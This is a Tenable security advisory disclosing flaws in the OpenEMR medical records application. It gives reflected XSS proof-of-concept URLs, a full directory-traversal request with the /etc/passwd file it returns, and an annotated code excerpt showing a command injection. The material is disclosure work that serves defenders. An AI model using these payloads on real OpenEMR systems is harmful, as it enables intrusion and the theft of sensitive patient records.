Synopsis
Tenable researchers have discovered a number of flaws in OpenEMR - a popular, open-source medical records application. These flaws, detailed below, could allow attackers to obtain sensitive patient data or possibly execute arbitrary code on the host system.
XSS - controller.php - patient_id parameter - CVE-2019-3963
controller.php is vulnerable to a reflected cross-site scripting attack via the patient_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0"><script>alert("XSS")</script>&document_id=
XSS - controller.php - doc_id parameter - CVE-2019-3964
controller.php is vulnerable to a reflected cross-site scripting attack via the doc_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&view&patient_id=0&doc_id=0"><script>alert("XSS")</script>
XSS - controller.php - document_id parameter - CVE-2019-3965
controller.php is vulnerable to a reflected cross-site scripting attack via the document_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0&document_id=1"><script>alert("XSS")</script>
XSS - controller.php - foreign_id parameter - CVE-2019-3966
controller.php is vulnerable to a reflected cross-site scripting attack via the foreign_id parameter (POST request). This could allow an attacker to execute arbitrary code in the context of the current user's session.
Directory Traversal and Arbitrary File Download - Patient File Downloads - CVE-2019-3967
A vulnerability exists in the patient file download interface that allowed authenticated users to download arbitrary files from the host system. This could allow an attacker to obtain sensitive patient information.
Proof of concept request:
POST /interface/patient_file/download_template.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/controller.php?document&upload&patient_id=0&parent_id=1& Content-Type: application/x-www-form-urlencoded Content-Length: 70 Connection: close Cookie: OpenEMR=ac4ac95557810d61c49af51436209596 Upgrade-Insecure-Requests: 1 patient_id=0&form_filename=../../../../../../../../../../../etc/passwd
Response:
HTTP/1.1 200 OK Date: Tue, 16 Apr 2019 15:00:22 GMT Server: Apache/2.4.34 (Unix) Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public Content-Description: File Transfer Content-Transfer-Encoding: binary Content-Disposition: attachment; filename="passwd_Doe_2." Content-Length: 1271 Connection: close Content-Type: application/octet-stream root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/bin/sh man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin apache:x:100:101:apache:/var/www:/sbin/nologin
Command Injection via /contrib/forms/scanned_notes/new.php - CVE-2019-3968
Unlike other uses of "exec" / "system" / "passthru" / etc., this form does not properly escape commands sent to the host OS, which allows for command injection via an authenticated user that has access to the scanned notes form. $formid is influenced directly by the user and passed directly into the commands executed later in the script. This could allow an attacker to inject arbitrary commands to be executed on the host system.
$formid = $_GET['id']; ... $imagepath = "$imagedir/${encounter}_$formid.jpg"; ^____ user controlled value ... $cmd = "convert -density 96 '$tmp_name' '$imagepath'"; ^____ Still contains user controlled value with no sanitation ... $tmp0 = exec($cmd, $tmp1, $tmp2); ^___ command is executed
Solution
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]